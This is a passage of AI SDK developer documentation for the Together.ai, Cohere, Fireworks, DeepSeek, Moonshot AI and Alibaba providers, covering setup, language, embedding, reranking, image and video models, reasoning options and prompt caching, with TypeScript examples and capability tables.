text: 'Make the background a lush rainforest',
images: ['https://example.com/photo.png'],
},
size: '1024x1024',
providerOptions: {
togetherai: {
steps: 28,
} satisfies TogetherAIImageModelOptions,
},
});
Supported Image Editing Models
| Model | Description |
|---|---|
| black-forest-labs/FLUX.1-kontext-pro | Production quality, balanced speed |
| black-forest-labs/FLUX.1-kontext-max | Maximum image fidelity |
| black-forest-labs/FLUX.1-kontext-dev | Development and experimentation |
Model Capabilities
Together.ai image models support various image dimensions that vary by model. Common sizes include 512x512, 768x768, and 1024x1024, with some models supporting up to 1792x1792. The default size is 1024x1024.
| Available Models |
|---|
| stabilityai/stable-diffusion-xl-base-1.0 |
| black-forest-labs/FLUX.1-dev |
| black-forest-labs/FLUX.1-dev-lora |
| black-forest-labs/FLUX.1-schnell |
| black-forest-labs/FLUX.1-canny |
| black-forest-labs/FLUX.1-depth |
| black-forest-labs/FLUX.1-redux |
| black-forest-labs/FLUX.1.1-pro |
| black-forest-labs/FLUX.1-pro |
| black-forest-labs/FLUX.1-schnell-Free |
| black-forest-labs/FLUX.1-kontext-pro |
| black-forest-labs/FLUX.1-kontext-max |
| black-forest-labs/FLUX.1-kontext-dev |
Embedding Models
You can create Together.ai embedding models using the .embeddingModel() factory method.
For more on embedding models with the AI SDK see embed().
import { togetherai } from '@ai-sdk/togetherai';
import { embed } from 'ai';
const { embedding } = await embed({
model: togetherai.embeddingModel('togethercomputer/m2-bert-80M-2k-retrieval'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| BAAI/bge-large-en-v1.5 | 1024 | 512 |
| Alibaba-NLP/gte-modernbert-base | 768 | 8192 |
| intfloat/multilingual-e5-large-instruct | 1024 | 514 |
Reranking Models
You can create Together.ai reranking models using the .reranking() factory method.
For more on reranking with the AI SDK see rerank().
import { togetherai } from '@ai-sdk/togetherai';
import { rerank } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Together.ai reranking models support additional provider options for object documents. You can specify which fields to use for ranking:
import {
togetherai,
type TogetherAIRerankingModelOptions,
} from '@ai-sdk/togetherai';
import { rerank } from 'ai';
const documents = [
{
from: 'Paul Doe',
subject: 'Follow-up',
text: 'We are happy to give you a discount of 20%.',
},
{
from: 'John McGill',
subject: 'Missing Info',
text: 'Here is the pricing from Oracle: $5000/month',
},
];
const { ranking } = await rerank({
model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
documents,
query: 'Which pricing did we get from Oracle?',
providerOptions: {
togetherai: {
rankFields: ['from', 'subject', 'text'], // Specify which fields to rank by
} satisfies TogetherAIRerankingModelOptions,
},
});
The following provider options are available:
-
rankFields string[]
Array of field names to use for ranking when documents are JSON objects. If not specified, all fields are used.
Model Capabilities
| Model |
|---|
| mixedbread-ai/Mxbai-Rerank-Large-V2 |
title: Cohere description: Learn how to use the Cohere provider for the AI SDK.
Cohere Provider
The Cohere provider contains language and embedding model support for the Cohere chat API.
Setup
The Cohere provider is available in the @ai-sdk/cohere module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn', 'bun']}>
Provider Instance
You can import the default provider instance cohere from @ai-sdk/cohere:
import { cohere } from '@ai-sdk/cohere';
If you need a customized setup, you can import createCohere from @ai-sdk/cohere
and create a provider instance with your settings:
import { createCohere } from '@ai-sdk/cohere';
const cohere = createCohere({
// custom settings
});
You can use the following optional settings to customize the Cohere provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.cohere.com/v2. -
apiKey string
API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
-
generateId () => string
Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.
Language Models
You can create models that call the Cohere chat API using a provider instance.
The first argument is the model id, e.g. command-r-plus.
Some Cohere chat models support tool calls.
const model = cohere('command-r-plus');
Example
You can use Cohere language models to generate text with the generateText function:
import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';
const { text } = await generateText({
model: cohere('command-r-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cohere language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| command-a-03-2025 | | | | |
| command-a-reasoning-08-2025 | | | | |
| command-r7b-12-2024 | | | | |
| command-r-plus-04-2024 | | | | |
| command-r-plus | | | | |
| command-r-08-2024 | | | | |
| command-r-03-2024 | | | | |
| command-r | | | | |
| command | | | | |
| command-nightly | | | | |
| command-light | | | | |
| command-light-nightly | | | | |
Reasoning
Cohere has introduced reasoning with the command-a-reasoning-08-2025 model. You can learn more at https://docs.cohere.com/docs/reasoning.
import { cohere, type CohereLanguageModelOptions } from '@ai-sdk/cohere';
import { generateText } from 'ai';
async function main() {
const { text, reasoning } = await generateText({
model: cohere('command-a-reasoning-08-2025'),
prompt:
"Alice has 3 brothers and she also has 2 sisters. How many sisters does Alice's brother have?",
// optional: reasoning options
providerOptions: {
cohere: {
thinking: {
type: 'enabled',
tokenBudget: 100,
},
} satisfies CohereLanguageModelOptions,
},
});
console.log(reasoning);
console.log(text);
}
main().catch(console.error);
Embedding Models
You can create models that call the Cohere embed API
using the .embedding() factory method.
const model = cohere.embedding('embed-english-v3.0');
You can use Cohere embedding models to generate embeddings with the embed function:
import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';
const { embedding } = await embed({
model: cohere.embedding('embed-english-v3.0'),
value: 'sunny day at the beach',
providerOptions: {
cohere: {
inputType: 'search_document',
} satisfies CohereEmbeddingModelOptions,
},
});
Cohere embedding models support additional provider options that can be passed via providerOptions.cohere:
import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';
const { embedding } = await embed({
model: cohere.embedding('embed-english-v3.0'),
value: 'sunny day at the beach',
providerOptions: {
cohere: {
inputType: 'search_document',
truncate: 'END',
} satisfies CohereEmbeddingModelOptions,
},
});
The following provider options are available:
- `inputType` ('search_document' | 'search_query' | 'classification' | 'clustering'): Specifies the type of input passed to the model. Default is `search_query`.
  - `search_document`: Used for embeddings stored in a vector database for search use-cases.
  - `search_query`: Used for embeddings of search queries run against a vector DB to find relevant documents.
  - `classification`: Used for embeddings passed through a text classifier.
  - `clustering`: Used for embeddings run through a clustering algorithm.
- `truncate` ('NONE' | 'START' | 'END'): Specifies how the API handles inputs longer than the maximum token length. Default is `END`.
  - `NONE`: Returns an error when the input exceeds the maximum input token length.
  - `START`: Discards the start of the input until the remaining input is exactly the maximum input token length for the model.
  - `END`: Discards the end of the input until the remaining input is exactly the maximum input token length for the model.
Model Capabilities
| Model | Embedding Dimensions |
|---|---|
| embed-english-v3.0 | 1024 |
| embed-multilingual-v3.0 | 1024 |
| embed-english-light-v3.0 | 384 |
| embed-multilingual-light-v3.0 | 384 |
| embed-english-v2.0 | 4096 |
| embed-english-light-v2.0 | 1024 |
| embed-multilingual-v2.0 | 768 |
Reranking Models
You can create models that call the Cohere rerank API
using the .reranking() factory method.
const model = cohere.reranking('rerank-v3.5');
You can use Cohere reranking models to rerank documents with the rerank function:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Cohere reranking models support additional provider options that can be passed via providerOptions.cohere:
import { cohere, type CohereRerankingModelOptions } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
providerOptions: {
cohere: {
maxTokensPerDoc: 1000,
priority: 1,
} satisfies CohereRerankingModelOptions,
},
});
The following provider options are available:
- `maxTokensPerDoc` (number): Maximum number of tokens per document. Default is `4096`.
- `priority` (number): Priority of the request. Default is `0`.
Model Capabilities
| Model |
|---|
| rerank-v3.5 |
| rerank-english-v3.0 |
| rerank-multilingual-v3.0 |
---
title: Fireworks
description: Learn how to use Fireworks models with the AI SDK.
---
Fireworks Provider
Fireworks is a platform for running and testing LLMs through their API.
Setup
The Fireworks provider is available via the `@ai-sdk/fireworks` module. You can install it with:
pnpm add @ai-sdk/fireworks
Provider Instance
You can import the default provider instance fireworks from @ai-sdk/fireworks:
import { fireworks } from '@ai-sdk/fireworks';
If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks
and create a provider instance with your settings:
import { createFireworks } from '@ai-sdk/fireworks';
const fireworks = createFireworks({
apiKey: process.env.FIREWORKS_API_KEY ?? '',
});
You can use the following optional settings to customize the Fireworks provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api.fireworks.ai/inference/v1`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `FIREWORKS_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create Fireworks models using a provider instance.
The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:
const model = fireworks('accounts/fireworks/models/firefunction-v1');
Reasoning Models
Fireworks exposes the thinking of deepseek-r1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
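For example, a minimal sketch reusing the enhancedModel from above:
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
  model: enhancedModel,
  prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log(reasoningText); // reasoning extracted from the <think> tag
console.log(text); // final answer without the reasoning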
Example
You can use Fireworks language models to generate text with the generateText function:
import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text } = await generateText({
model: fireworks('accounts/fireworks/models/firefunction-v1'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Fireworks language models can also be used in the streamText function
(see AI SDK Core).
Provider Options
Fireworks chat models support additional provider options that are not part of
the standard call settings. You can pass them in the providerOptions argument:
import {
fireworks,
type FireworksLanguageModelOptions,
} from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
model: fireworks('accounts/fireworks/models/kimi-k2p5'),
providerOptions: {
fireworks: {
thinking: { type: 'enabled', budgetTokens: 4096 },
reasoningHistory: 'interleaved',
} satisfies FireworksLanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
The following optional provider options are available for Fireworks chat models:
- `thinking` (object): Configuration for thinking/reasoning models like Kimi K2.5.
  - `type` ('enabled' | 'disabled'): Whether to enable thinking mode.
  - `budgetTokens` (number): Maximum number of tokens for thinking (minimum 1024).
- `reasoningHistory` ('disabled' | 'interleaved' | 'preserved'): Controls how reasoning history is handled in multi-turn conversations:
  - `'disabled'`: Remove reasoning from history.
  - `'interleaved'`: Include reasoning between tool calls within a single turn.
  - `'preserved'`: Keep all reasoning in history.
Completion Models
You can create models that call the Fireworks completions API using the .completionModel() factory method:
const model = fireworks.completionModel(
'accounts/fireworks/models/firefunction-v1',
);
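The resulting model can then be used like any other language model, for example a quick sketch with generateText:
import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text } = await generateText({
  model: fireworks.completionModel('accounts/fireworks/models/firefunction-v1'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});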
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| accounts/fireworks/models/firefunction-v1 | | | | |
| accounts/fireworks/models/deepseek-r1 | | | | |
| accounts/fireworks/models/deepseek-v3 | | | | |
| accounts/fireworks/models/llama-v3p1-405b-instruct | | | | |
| accounts/fireworks/models/llama-v3p1-8b-instruct | | | | |
| accounts/fireworks/models/llama-v3p2-3b-instruct | | | | |
| accounts/fireworks/models/llama-v3p3-70b-instruct | | | | |
| accounts/fireworks/models/mixtral-8x7b-instruct | | | | |
| accounts/fireworks/models/mixtral-8x7b-instruct-hf | | | | |
| accounts/fireworks/models/mixtral-8x22b-instruct | | | | |
| accounts/fireworks/models/qwen2p5-coder-32b-instruct | | | | |
| accounts/fireworks/models/qwen2p5-72b-instruct | | | | |
| accounts/fireworks/models/qwen-qwq-32b-preview | | | | |
| accounts/fireworks/models/qwen2-vl-72b-instruct | | | | |
| accounts/fireworks/models/llama-v3p2-11b-vision-instruct | | | | |
| accounts/fireworks/models/qwq-32b | | | | |
| accounts/fireworks/models/yi-large | | | | |
| accounts/fireworks/models/kimi-k2-instruct | | | | |
| accounts/fireworks/models/kimi-k2-thinking | | | | |
| accounts/fireworks/models/kimi-k2p5 | | | | |
| accounts/fireworks/models/minimax-m2 | | | | |
Embedding Models
You can create models that call the Fireworks embeddings API using the .embeddingModel() factory method:
const model = fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5');
You can use Fireworks embedding models to generate embeddings with the embed function:
import { fireworks } from '@ai-sdk/fireworks';
import { embed } from 'ai';
const { embedding } = await embed({
model: fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| nomic-ai/nomic-embed-text-v1.5 | 768 | 8192 |
Image Models
You can create Fireworks image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Image Editing
Fireworks supports image editing through FLUX Kontext models (flux-kontext-pro and flux-kontext-max). Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { readFileSync } from 'node:fs';
import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
providerOptions: {
fireworks: {
output_format: 'jpeg',
},
},
});
Style Transfer
Apply artistic styles to an image:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
prompt: {
text: 'Transform this into a watercolor painting style',
images: [imageBuffer],
},
aspectRatio: '1:1',
});
Model Capabilities
For all models supporting aspect ratios, the following aspect ratios are supported:
1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
For all models supporting size, the following sizes are supported:
640 x 1536, 768 x 1344, 832 x 1216, 896 x 1152, 1024 x 1024 (default), 1152 x 896, 1216 x 832, 1344 x 768, 1536 x 640
| Model | Dimensions Specification | Image Editing |
|---|---|---|
| accounts/fireworks/models/flux-kontext-pro | Aspect Ratio | |
| accounts/fireworks/models/flux-kontext-max | Aspect Ratio | |
| accounts/fireworks/models/flux-1-dev-fp8 | Aspect Ratio | |
| accounts/fireworks/models/flux-1-schnell-fp8 | Aspect Ratio | |
| accounts/fireworks/models/playground-v2-5-1024px-aesthetic | Size | |
| accounts/fireworks/models/japanese-stable-diffusion-xl | Size | |
| accounts/fireworks/models/playground-v2-1024px-aesthetic | Size | |
| accounts/fireworks/models/SSD-1B | Size | |
| accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | Size | |
For more details, see the Fireworks models page.
Stability AI Models
Fireworks also offers several Stability AI models, backed by Stability AI API keys and endpoints. The AI SDK Fireworks provider does not currently support these models:
| Model ID |
|---|
| accounts/stability/models/sd3-turbo |
| accounts/stability/models/sd3-medium |
| accounts/stability/models/sd3 |
---
title: DeepSeek
description: Learn how to use DeepSeek's models with the AI SDK.
---
DeepSeek Provider
The DeepSeek provider offers access to powerful language models through the DeepSeek API.
API keys can be obtained from the DeepSeek Platform.
Setup
The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:
pnpm add @ai-sdk/deepseek
Provider Instance
You can import the default provider instance deepseek from @ai-sdk/deepseek:
import { deepseek } from '@ai-sdk/deepseek';
For custom configuration, you can import createDeepSeek and create a provider instance with your settings:
import { createDeepSeek } from '@ai-sdk/deepseek';
const deepseek = createDeepSeek({
apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepSeek provider instance:
- `baseURL` (string): Use a different URL prefix for API calls. The default prefix is `https://api.deepseek.com`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `DEEPSEEK_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chat() or .languageModel() factory methods:
const model = deepseek.chat('deepseek-chat');
// or
const model = deepseek.languageModel('deepseek-chat');
DeepSeek language models can be used in the streamText function
(see AI SDK Core).
The following optional provider options are available for DeepSeek models:
- `thinking` (object): Optional. Controls thinking mode (chain-of-thought reasoning). You can enable thinking mode either by using the `deepseek-reasoner` model or by setting this option.
  - `type` ('enabled' | 'disabled'): Enable or disable thinking mode.
import { deepseek, type DeepSeekLanguageModelOptions } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text, reasoning } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'How many "r"s are in the word "strawberry"?',
providerOptions: {
deepseek: {
thinking: { type: 'enabled' },
} satisfies DeepSeekLanguageModelOptions,
},
});
Reasoning
DeepSeek has reasoning support for the deepseek-reasoner model. The reasoning is exposed through streaming:
import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';
const result = streamText({
model: deepseek('deepseek-reasoner'),
prompt: 'How many "r"s are in the word "strawberry"?',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
// This is the reasoning text
console.log('Reasoning:', part.text);
} else if (part.type === 'text') {
// This is the final answer
console.log('Answer:', part.text);
}
}
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Token Usage
DeepSeek provides context caching on disk technology that can significantly reduce token costs for repeated content. You can access the cache hit/miss metrics through the providerMetadata property in the response:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const result = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Your prompt here',
});
console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }
The metrics include:
- `promptCacheHitTokens`: Number of input tokens that were cached.
- `promptCacheMissTokens`: Number of input tokens that were not cached.
Model Capabilities
| Model | Text Generation | Object Generation | Image Input | Tool Usage | Tool Streaming |
|---|---|---|---|---|---|
| deepseek-chat | | | | | |
| deepseek-reasoner | | | | | |
---
title: Moonshot AI
description: Learn how to use Moonshot AI models with the AI SDK.
---
Moonshot AI Provider
The Moonshot AI provider offers access to powerful language models through the Moonshot API, including the Kimi series of models with reasoning capabilities.
API keys can be obtained from the Moonshot Platform.
Setup
The Moonshot AI provider is available via the @ai-sdk/moonshotai module. You can install it with:
pnpm add @ai-sdk/moonshotai
Provider Instance
You can import the default provider instance moonshotai from @ai-sdk/moonshotai:
import { moonshotai } from '@ai-sdk/moonshotai';
For custom configuration, you can import createMoonshotAI and create a provider instance with your settings:
import { createMoonshotAI } from '@ai-sdk/moonshotai';
const moonshotai = createMoonshotAI({
apiKey: process.env.MOONSHOT_API_KEY ?? '',
});
You can use the following optional settings to customize the Moonshot AI provider instance:
- `baseURL` (string): Use a different URL prefix for API calls. The default prefix is `https://api.moonshot.ai/v1`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `MOONSHOT_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { moonshotai } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';
const { text } = await generateText({
model: moonshotai('kimi-k2.5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chatModel() or .languageModel() factory methods:
const model = moonshotai.chatModel('kimi-k2.5');
// or
const model = moonshotai.languageModel('kimi-k2.5');
Moonshot AI language models can be used in the streamText function
(see AI SDK Core).
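For example, a minimal streaming sketch:
import { moonshotai } from '@ai-sdk/moonshotai';
import { streamText } from 'ai';
const result = streamText({
  model: moonshotai('kimi-k2.5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
// print the text as it streams in
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}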
Reasoning Models
Moonshot AI offers thinking models like kimi-k2-thinking that generate intermediate reasoning tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.
import {
moonshotai,
type MoonshotAILanguageModelOptions,
} from '@ai-sdk/moonshotai';
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
model: moonshotai('kimi-k2-thinking'),
providerOptions: {
moonshotai: {
thinking: { type: 'enabled', budgetTokens: 2048 },
reasoningHistory: 'interleaved',
} satisfies MoonshotAILanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log(reasoningText);
console.log(text);
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Provider Options
The following optional provider options are available for Moonshot AI language models:
- `thinking` (object): Configuration for thinking/reasoning models like Kimi K2 Thinking.
  - `type` ('enabled' | 'disabled'): Whether to enable thinking mode.
  - `budgetTokens` (number): Maximum number of tokens for thinking (minimum 1024).
- `reasoningHistory` ('disabled' | 'interleaved' | 'preserved'): Controls how reasoning history is handled in multi-turn conversations:
  - `'disabled'`: Remove reasoning from history.
  - `'interleaved'`: Include reasoning between tool calls within a single turn.
  - `'preserved'`: Keep all reasoning in history.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| moonshot-v1-8k | | | | |
| moonshot-v1-32k | | | | |
| moonshot-v1-128k | | | | |
| kimi-k2 | | | | |
| kimi-k2.5 | | | | |
| kimi-k2-thinking | | | | |
| kimi-k2-thinking-turbo | | | | |
| kimi-k2-turbo | | | | |
---
title: Alibaba
description: Learn how to use Alibaba Cloud Model Studio (Qwen) models with the AI SDK.
---
Alibaba Provider
Alibaba Cloud Model Studio provides access to the Qwen model series, including advanced reasoning capabilities.
API keys can be obtained from the Console.
Setup
The Alibaba provider is available via the @ai-sdk/alibaba module. You can install it with:
pnpm add @ai-sdk/alibaba
Provider Instance
You can import the default provider instance alibaba from @ai-sdk/alibaba:
import { alibaba } from '@ai-sdk/alibaba';
For custom configuration, you can import createAlibaba and create a provider instance with your settings:
import { createAlibaba } from '@ai-sdk/alibaba';
const alibaba = createAlibaba({
apiKey: process.env.ALIBABA_API_KEY ?? '',
});
You can use the following optional settings to customize the Alibaba provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers or regional endpoints. The default prefix is `https://dashscope-intl.aliyuncs.com/compatible-mode/v1`.
- `videoBaseURL` (string): Use a different URL prefix for video generation API calls. The video API uses the DashScope native endpoint (not the OpenAI-compatible endpoint). The default prefix is `https://dashscope-intl.aliyuncs.com`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `ALIBABA_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
- `includeUsage` (boolean): Include usage information in streaming responses. When enabled, token usage will be included in the final chunk. Defaults to `true`.
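For example, a sketch of a customized instance that turns off streaming usage reporting:
import { createAlibaba } from '@ai-sdk/alibaba';
const alibaba = createAlibaba({
  apiKey: process.env.ALIBABA_API_KEY ?? '',
  includeUsage: false, // omit token usage from the final streaming chunk
});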
Language Models
You can create language models using a provider instance:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text } = await generateText({
model: alibaba('qwen-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chatModel() or .languageModel() factory methods:
const model = alibaba.chatModel('qwen-plus');
// or
const model = alibaba.languageModel('qwen-plus');
Alibaba language models can be used in the streamText function
(see AI SDK Core).
The following optional provider options are available for Alibaba models:
- `enableThinking` (boolean): Enable thinking/reasoning mode for supported models. When enabled, the model generates reasoning content before the response. Defaults to `false`.
- `thinkingBudget` (number): Maximum number of reasoning tokens to generate. Limits the length of thinking content.
- `parallelToolCalls` (boolean): Whether to enable parallel function calling during tool use. Defaults to `true`.
Thinking Mode
Alibaba's Qwen models support thinking/reasoning mode for complex problem-solving:
import { alibaba, type AlibabaLanguageModelOptions } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text, reasoning } = await generateText({
model: alibaba('qwen3-max'),
providerOptions: {
alibaba: {
enableThinking: true,
thinkingBudget: 2048,
} satisfies AlibabaLanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log('Reasoning:', reasoning);
console.log('Answer:', text);
For models that are thinking-only (like qwen3-235b-a22b-thinking-2507), thinking mode is enabled by default.
Tool Calling
Alibaba models support tool calling with parallel execution:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const { text } = await generateText({
model: alibaba('qwen-plus'),
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in San Francisco?',
});
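To force sequential tool execution instead, here is a sketch using the parallelToolCalls option documented above (the time tool is hypothetical):
import { alibaba, type AlibabaLanguageModelOptions } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const { text } = await generateText({
  model: alibaba('qwen-plus'),
  tools: {
    time: tool({
      description: 'Get the current time in a timezone',
      inputSchema: z.object({ timezone: z.string() }),
      execute: async ({ timezone }) =>
        new Date().toLocaleString('en-US', { timeZone: timezone }),
    }),
  },
  providerOptions: {
    alibaba: {
      parallelToolCalls: false, // resolve tool calls one at a time
    } satisfies AlibabaLanguageModelOptions,
  },
  prompt: 'What time is it in Tokyo and in Paris?',
});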
Prompt Caching
Alibaba supports both implicit and explicit prompt caching to reduce costs for repeated prompts.
Implicit caching works automatically - the provider caches appropriate content without any configuration. For more control, you can use explicit caching by marking specific messages with cacheControl:
Single message cache control
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text, usage } = await generateText({
model: alibaba('qwen-plus'),
messages: [
{
role: 'system',
content: 'You are a helpful assistant. [... long system prompt ...]',
providerOptions: {
alibaba: {
cacheControl: { type: 'ephemeral' },
},
},
},
],
});
Multi-part message cache control
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const longDocument = '... large document content ...';
const { text, usage } = await generateText({
model: alibaba('qwen-plus'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Context: Please analyze this document.',
},
{
type: 'text',
text: longDocument,
providerOptions: {
alibaba: {
cacheControl: { type: 'ephemeral' },
},
},
},
],
},
],
});
Note: The minimum content length for a cache block is 1,024 tokens.
Video Models
You can create Wan video models that call the Alibaba Cloud DashScope API
using the .video() factory method. For more on video generation with the AI SDK see generateVideo().
Alibaba supports three video generation modes: text-to-video, image-to-video (first frame), and reference-to-video.
Text-to-Video
Generate videos from text prompts:
import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: alibaba.video('wan2.6-t2v'),
prompt: 'A serene mountain lake at sunset with gentle ripples on the water.',
resolution: '1280x720',
duration: 5,
providerOptions: {
alibaba: {
promptExtend: true,
pollTimeoutMs: 600000, // 10 minutes
} satisfies AlibabaVideoModelOptions,
},
});
Image-to-Video
Generate videos from a first-frame image and optional text prompt:
import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: alibaba.video('wan2.6-i2v'),
prompt: {
image: 'https://example.com/landscape.jpg',
text: 'Camera slowly pans across the landscape',
},
duration: 5,
providerOptions: {
alibaba: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies AlibabaVideoModelOptions,
},
});
Reference-to-Video
Generate videos using reference images and/or videos for character consistency. Use character identifiers
(character1, character2, etc.) in your prompt to reference them:
